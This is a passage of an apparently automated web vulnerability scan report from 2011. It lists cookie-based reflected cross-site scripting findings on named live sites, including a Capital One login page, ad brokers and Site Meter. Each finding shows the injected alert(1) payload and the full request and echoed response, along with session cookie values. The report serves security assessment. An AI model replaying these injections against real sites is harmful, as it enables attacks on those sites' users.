Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-131127126968388<script>alert(1)</script>e06b9decce1

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:40 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:40 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:40 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
"BMX_G": 'method->-1,ts->1311271258', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-131127126968388<script>alert(1)</script>e06b9decce1', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu
...[SNIP]...

3.125. http://ar.voicefive.com/bmx3/broker.pli [ar_p101983071 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p101983071 cookie is copied into the HTML document as plain text between tags. The payload 5dffa<script>alert(1)</script>69beef29e58 was submitted in the ar_p101983071 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&5dffa<script>alert(1)</script>69beef29e58; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:37 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:37 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:37 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
hu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27 2011&prad=1355335&arc=1498970&', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&5dffa<script>alert(1)</script>69beef29e58' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.com/$|zone.msn.com|xbox.com|www.aol.com/$|http://Webmail.aol.com/$|http://travel.aol.com/$|http://netscape.aol.com/$|http
...[SNIP]...

3.126. http://ar.voicefive.com/bmx3/broker.pli [ar_p110040101 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p110040101 cookie is copied into the HTML document as plain text between tags. The payload c95f7<script>alert(1)</script>6cac0769b07 was submitted in the ar_p110040101 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&c95f7<script>alert(1)</script>6cac0769b07; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:38 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:38 2011&c95f7<script>alert(1)</script>6cac0769b07=&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:38 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
tExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&c95f7<script>alert(1)</script>6cac0769b07', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&' };
COMSCORE.BMX.Broker.GlobalConfig={
"urlExcludeList": "http://photobucket.c
...[SNIP]...

3.127. http://ar.voicefive.com/bmx3/broker.pli [ar_p87077372 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p87077372 cookie is copied into the HTML document as plain text between tags. The payload f606e<script>alert(1)</script>aeace3a3569 was submitted in the ar_p87077372 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&f606e<script>alert(1)</script>aeace3a3569; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:36 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
ll};})();}COMSCORE.BMX.Broker.Cookies={ "BMX_G": 'method->-1,ts->1311271258', "ar_p87077372": 'exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&f606e<script>alert(1)</script>aeace3a3569', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&', "ar_p110040101": 'exp=2&in
...[SNIP]...

3.128. http://ar.voicefive.com/bmx3/broker.pli [ar_p98294060 cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ar.voicefive.com
Path:	/bmx3/broker.pli

Issue detail

The value of the ar_p98294060 cookie is copied into the HTML document as plain text between tags. The payload e39ca<script>alert(1)</script>0ee60f18c48 was submitted in the ar_p98294060 cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /bmx3/broker.pli?pid=p110040101&PRAd=1355335&AR_C=1498970 HTTP/1.1
Host: ar.voicefive.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://games.myyearbook.com/landing/pool
Cookie: ar_p87077372=exp=1&initExp=Tue May 3 15:42:17 2011&recExp=Tue May 3 15:42:17 2011&prad=124094&arc=184537%3F684451&; ar_p98294060=exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&e39ca<script>alert(1)</script>0ee60f18c48; ar_p101983071=exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:40:10 2011&prad=63480745&arc=42046148&; ar_p110040101=exp=1&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:00:58 2011&prad=1355334&arc=1498300&; BMX_G=method->-1,ts->1311271258; BMX_3PC=1; UID=39460fd-77.67.87.8-1311271269

Response

HTTP/1.1 200 OK
Server: nginx
Date: Thu, 21 Jul 2011 18:42:36 GMT
Content-Type: application/x-javascript
Connection: close
Set-Cookie: ar_p110040101=exp=3&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:36 2011&prad=1355335&arc=1498970&; expires=Wed 19-Oct-2011 18:42:36 GMT; path=/; domain=.voicefive.com;
Set-Cookie: BMX_3PC=1; path=/; domain=.voicefive.com;
P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT"
Cache-Control: max-age=0, no-cache, no-store, must-revalidate
Pragma: no-cache
Expires: -1
Vary: User-Agent,Accept-Encoding
Content-Length: 28729

if(typeof(COMSCORE)!="undefined"&&typeof(COMSCORE.BMX)!="undefined"&&typeof(COMSCORE.BMX.Broker)!="undefined"){COMSCORE.BMX.Broker.logCensus({Prad:"1355335",Pid:"p110040101",Arc:"1498970",Location:COM
...[SNIP]...
ad=124094&arc=184537%3F684451&', "UID": '39460fd-77.67.87.8-1311271269', "BMX_3PC": '1', "ar_p98294060": 'exp=3&initExp=Wed May 11 10:54:18 2011&recExp=Wed May 11 11:00:09 2011&prad=14731&arc=33392&e39ca<script>alert(1)</script>0ee60f18c48', "ar_p110040101": 'exp=2&initExp=Thu Jul 21 18:00:58 2011&recExp=Thu Jul 21 18:42:27 2011&prad=1355335&arc=1498970&', "ar_p101983071": 'exp=1&initExp=Tue May 17 14:40:10 2011&recExp=Tue May 17 14:4
...[SNIP]...

3.129. http://seg.sharethis.com/getSegment.php [__stid cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://seg.sharethis.com
Path:	/getSegment.php

Issue detail

The value of the __stid cookie is copied into the HTML document as plain text between tags. The payload bbafa<script>alert(1)</script>202899b8423 was submitted in the __stid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /getSegment.php?purl=http%3A%2F%2Fwww.uscgnews.com%2Fgo%2Fdoc%2F786%2F1135035%2F&jsref=http%3A%2F%2Fwww.fakereferrerdominator.com%2FreferrerPathName%3FRefParName%3DRefValue&rnd=1311370085769 HTTP/1.1
Host: seg.sharethis.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.uscgnews.com/go/doc/786/1135035/
Cookie: __stid=CspjoE3JR6aX8hTKEPglAg==bbafa<script>alert(1)</script>202899b8423

Response

HTTP/1.1 200 OK
Server: nginx/0.8.47
Date: Fri, 22 Jul 2011 21:28:00 GMT
Content-Type: text/html
Connection: keep-alive
X-Powered-By: PHP/5.3.3
P3P: "policyref="/w3c/p3p.xml", CP="ALL DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV INT DEM"
Content-Length: 2615

           <!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
           <html>
           <head>
           <meta http-equiv="Content-type" content="text/html;charset=UTF-8">

...[SNIP]...
<div style='display:none'>clicookie:CspjoE3JR6aX8hTKEPglAg==bbafa<script>alert(1)</script>202899b8423
userid:
</div>
...[SNIP]...

3.130. https://servicing.capitalone.com/c1/login.aspx [VS_COOKIE cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://servicing.capitalone.com
Path:	/c1/login.aspx

Issue detail

The value of the VS_COOKIE cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 65e16"-alert(1)-"55101615765 was submitted in the VS_COOKIE cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /c1/login.aspx HTTP/1.1
Host: servicing.capitalone.com
Connection: keep-alive
Referer: http://www.capitalone.com/contactus/index.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=FB8DCF93533EFDA4; caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0400; caponeaf_split=exp1%3DA_exp2%3DA_exp3%3DA_exp4%3DA_exp5%3DA_exp6%3DA_exp7%3DA; __utma=106121180.767001896.1311366537.1311366537.1311366537.1; __utmb=106121180.1.10.1311366537; __utmc=106121180; __utmz=106121180.1311366537.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); LP_GROUP=49; caponesn=af558df5VY%2FBjsIwDET%2FJXckO1C2dU9oJY574ANauWlEi0pSJbkA5d%2FXLblw8pNnPBpf7HX0rolUkvrjJMyTqhvnnV0MzzKMEVUfSZ3OZ9IAJRxA79IVcKcBEY5QyQEWBVRL2NJ4eo6z8b2Vw4IUAiBsln1RLu3sQ%2BKp%2FVjbp%2FllM9iGCekVCQ%2FZv2YDVKhVzRLy2pK6foxJ1ZH2pKRIpsl3K4keOmf6zDFxsitrUu6Rl3e%2B%2BZDZSY9hZXmtC%2BzM8C2839IYf6p%2F; lpVsGroupTracker=ndb; itc=CAPITALONE11NZZZDN1QSWZD4; mbox=check#true#1311366883|session#1311366822807-148063#1311368683|disable#browser%20timeout#1311370442; ASP.NET_SessionId=t40lmqeexjtjkkvhq4caiv55; COUNTRYCODE=USA; TestCookie=OK; ssotgt=f2eos; C1_REDIRECT=; SSP_Params=; VS_COOKIE=Login65e16"-alert(1)-"55101615765; bank=dotcom

Response (redirected)

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Date: Fri, 22 Jul 2011 20:43:41 GMT
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 1.1.4322
Set-Cookie: VS_COOKIE=LoginError; domain=capitalone.com; path=/;HttpOnly
Vary: Accept-Encoding
Content-Length: 13852

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
"http://www.w3.org/TR/html4/loose.dtd">
<html>
<head id="HTMLHEAD">
<meta http-equiv="Cache-Control" content="no-cache, no-sto
...[SNIP]...
<script language="JavaScript">var attributes = new Array();attributes[0] = "appname=EOS";attributes[1] = "PageName=LoginError";attributes[2] = "PreviousPage=Login65e16"-alert(1)-"55101615765";var appScriptUri = "/C1/Themes/TopTabMenu/Script/null.js";writeAnalytic(attributes, appScriptUri);</script>
...[SNIP]...

3.131. http://sm6.sitemeter.com/js/counter.asp [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sm6.sitemeter.com
Path:	/js/counter.asp

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6f4ae"%3balert(1)//edcd6dc1283 was submitted in the IP cookie. This input was echoed as 6f4ae";alert(1)//edcd6dc1283 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.asp?site=sm6damnhippy HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/science_technology/?campaign=th_nav_scitech
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E2436f4ae"%3balert(1)//edcd6dc1283

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:43:20 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7294
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:53:20 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.2436f4ae";alert(1)//edcd6dc1283";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.132. http://sm6.sitemeter.com/js/counter.js [IP cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://sm6.sitemeter.com
Path:	/js/counter.js

Issue detail

The value of the IP cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 914da"%3balert(1)//2b32c6424b3 was submitted in the IP cookie. This input was echoed as 914da";alert(1)//2b32c6424b3 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /js/counter.js?site=sm6damnhippy HTTP/1.1
Host: sm6.sitemeter.com
Proxy-Connection: keep-alive
Referer: http://www.treehugger.com/travel_nature/?campaign=th_nav_travel
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: IP=173%2E193%2E214%2E243914da"%3balert(1)//2b32c6424b3

Response (redirected)

HTTP/1.1 200 OK
Connection: close
Date: Sat, 23 Jul 2011 13:19:40 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
P3P: policyref="/w3c/p3pEXTRA.xml", CP="NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 7294
Content-Type: application/x-javascript
Expires: Sat, 23 Jul 2011 13:29:40 GMT
Cache-control: private

// Copyright (c)2006 Site Meter, Inc.
// <![CDATA[
var SiteMeter =
{
   init:function( sCodeName, sServerName, sSecurityCode )
   {
       SiteMeter.CodeName = sCodeName;
       SiteMeter.ServerName = sServerName;
       SiteMeter.SecurityCode = sSecurityCode;
       SiteMeter.IP = "173.193.214.243914da";alert(1)//2b32c6424b3";
       SiteMeter.trackingImage = new Image();
       SiteMeter.dgOutlinkImage = new Image();

       if (typeof(g_sLastCodeName) != 'undefined')
           if (g_sLastCodeName == sCodeName)
               return;

       SiteMete
...[SNIP]...

3.133. http://tag.admeld.com/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220 [meld_sess cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220

Issue detail

The value of the meld_sess cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a3487"><script>alert(1)</script>ec6aea0cfca was submitted in the meld_sess cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /ad/iframe/610/bostonglobe/728x90/bg_1064637_61606220?t=1311428802392&tz=300&hu=&ht=js&hp=0&url=http%3A%2F%2Fwww.boston.com%2Flifestyle%2Farticles%2F2011%2F07%2F23%2Ffacebook_twitter_obligations_persist_during_vacations%2F%3Fp1%3DUpbox_links&refer= HTTP/1.1
Host: tag.admeld.com
Proxy-Connection: keep-alive
Referer: http://www.boston.com/lifestyle/articles/2011/07/23/facebook_twitter_obligations_persist_during_vacations/?p1=Upbox_links
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: meld_sess=d96a784e-8901-47de-9dd1-4f91acb31514a3487"><script>alert(1)</script>ec6aea0cfca; __qca=P0-1342016851-1308225219551; D41U=3ldWxSUW5smmT8Cr1TVsp8odr2wpaUd4kIG9UWzIHns3qOaGxdAxaGw

Response

3.134. http://www.myyearbook.com/advertising/default.php [MYB_TARGET cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.myyearbook.com
Path:	/advertising/default.php

Issue detail

The value of the MYB_TARGET cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d6cc0</script><script>alert(1)</script>8e6a735c675 was submitted in the MYB_TARGET cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

